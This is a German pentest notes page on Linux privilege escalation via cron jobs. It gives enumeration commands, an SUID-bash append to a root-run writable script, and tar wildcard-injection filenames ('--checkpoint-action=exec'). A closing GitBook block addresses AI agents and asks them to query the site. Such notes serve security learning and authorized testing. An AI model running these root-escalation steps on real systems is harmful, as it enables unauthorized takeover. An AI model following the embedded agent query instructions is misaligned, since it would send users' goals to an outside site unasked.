> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/de/privesc/cron-jobs.md).

# Cron-Jobs

Cron-Jobs schaffen Wege zur Rechteausweitung, wenn wiederkehrende Root-Aufgaben beschreibbare Skripte, unsichere relative Pfade oder anfällige Prozessoren ausführen. Der Schlüssel ist zu beweisen, dass ein Benutzer mit niedrigen Rechten etwas kontrolliert, das eine privilegierte geplante Aufgabe ausführen wird.

## Methodik

* Überprüfen Sie die systemweiten Crontabs, Cron-Verzeichnisse, Timer und beschreibbaren Skripte.
* Verwenden Sie pspy64, um kurzlebige Prozesse ohne Root-Rechte zu beobachten.
* Prüfen Sie, ob der Job unsichere PATH-Werte, beschreibbare Dateien oder angreifergesteuerte Eingabeverzeichnisse verwendet.

## Schnellprüfungen

```bash
crontab -l
cat /etc/crontab
ls -la /etc/cron.*
cat /etc/cron* 2>/dev/null
find /etc/cron* -type f -exec ls -la {} \; 2>/dev/null
find /var/spool/cron -type f -exec ls -la {} \; 2>/dev/null
systemctl list-timers --all
```

## Beschreibbare Cron-Ziele

Suchen Sie nach Skripten oder Verzeichnissen, die ein privilegierter Cron-Job ausführt und die ein Benutzer mit niedrigen Rechten ändern kann.

```bash
find /etc/cron* -type f -writable 2>/dev/null
find / -writable -type f -path "*cron*" 2>/dev/null
```

Verwenden Sie `pspy64` wenn Cron-Jobs kurzlebig oder in statischen Dateien nicht sichtbar sind:

```bash
./pspy64
```

Wenn ein Root-Cron-Job ein beschreibbares Skript ausführt, ist ein einfacher Validierungspfad, ein SUID-Bit auf Bash zu setzen und zu warten, bis der Zeitplan ausgeführt wird:

```bash
echo 'chmod +s /bin/bash' >> /path/to/writable/script.sh
/bin/bash -p
```

### Wildcard-Injektion

Wenn ein Cron-Job Archivbefehle mit Wildcards über einem beschreibbaren Verzeichnis verwendet, können Dateinamen zu Befehlsoptionen werden.

```bash
cd /var/www/
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > exploit.sh
chmod +x exploit.sh
touch -- "--checkpoint=1"
touch -- "--checkpoint-action=exec=sh exploit.sh"
```

Nachdem der Cron-Job ausgeführt wurde:

```bash
/tmp/bash -p
```

<table data-view="cards" data-full-width="false" data-search="false"><thead><tr><th></th><th></th><th></th><th data-hidden data-card-target data-type="content-ref"></th></tr></thead><tbody><tr><td><h3><i class="fa-clock" style="color:$primary;">:clock:</i></h3></td><td><h4>Cron-Ausdrucksrechner</h4></td><td>Suche nach gängigen Cron-Ausdrücken, Sonderzeichenketten, Feldsyntax, Bedeutungen der Zeitpläne und Hinweisen zur Überprüfung auf Rechteausweitung.</td><td><a href="/pages/a661c6670ecf28d617f1be8bb43297b001bad305">/pages/a661c6670ecf28d617f1be8bb43297b001bad305</a></td></tr><tr><td><h3><i class="fa-clock" style="color:$primary;">:clock:</i></h3></td><td><h4>pspy64 Cron-Aufzählung</h4></td><td>pspy64-Werkzeughinweise für Linux-Rechteausweitung, mit Aufzählungsschritten, Ausnutzungsbeispielen und auf Berichterstattung ausgerichteter Validierung.</td><td><a href="/pages/bffbe76ef30f74bb39111a08776de322ade82e39">/pages/bffbe76ef30f74bb39111a08776de322ade82e39</a></td></tr><tr><td><h3><i class="fa-clock" style="color:$primary;">:clock:</i></h3></td><td><h4>Cron-Job mit verändertem Bash-Skript</h4></td><td>Cron-Jobs - Notizen zu verändertem Skript (Bash) für Linux-Rechteausweitung, mit Aufzählungsschritten, Ausnutzungsbeispielen und auf Berichterstattung ausgerichteter Validierung.</td><td><a href="/pages/ee8ae4e0bf81d93ed7a164775afe5b789b73e35a">/pages/ee8ae4e0bf81d93ed7a164775afe5b789b73e35a</a></td></tr><tr><td><h3><i class="fa-clock" style="color:$primary;">:clock:</i></h3></td><td><h4>Cron-Job mit verändertem Python-Skript</h4></td><td>Cron-Jobs - Notizen zu verändertem Skript (Python) für Linux-Rechteausweitung, mit Aufzählungsschritten, Ausnutzungsbeispielen und auf Berichterstattung ausgerichteter Validierung.</td><td><a href="/pages/98171e4c45a6847f123a3b43814a938b323e3a61">/pages/98171e4c45a6847f123a3b43814a938b323e3a61</a></td></tr><tr><td><h3><i class="fa-clock" style="color:$primary;">:clock:</i></h3></td><td><h4>ImageMagick-Cron-Missbrauch</h4></td><td>Cron-Jobs - Notizen zur Ausnutzung von ImageMagick für Linux-Rechteausweitung, mit Aufzählungsschritten, Ausnutzungsbeispielen und auf Berichterstattung ausgerichteter Validierung.</td><td><a href="/pages/e07e5ac0400b2eb69fa599464a93952a26a20a91">/pages/e07e5ac0400b2eb69fa599464a93952a26a20a91</a></td></tr><tr><td><h3><i class="fa-clock" style="color:$primary;">:clock:</i></h3></td><td><h4>Logstash-Cron-Missbrauch</h4></td><td>Cron-Jobs (Logstash) - Notizen für Linux-Rechteausweitung, mit Aufzählungsschritten, Ausnutzungsbeispielen und auf Berichterstattung ausgerichteter Validierung.</td><td><a href="/pages/516b80ff9ba1e7c35adfbaba9e354b5f52391fcb">/pages/516b80ff9ba1e7c35adfbaba9e354b5f52391fcb</a></td></tr></tbody></table>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/de/privesc/cron-jobs.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
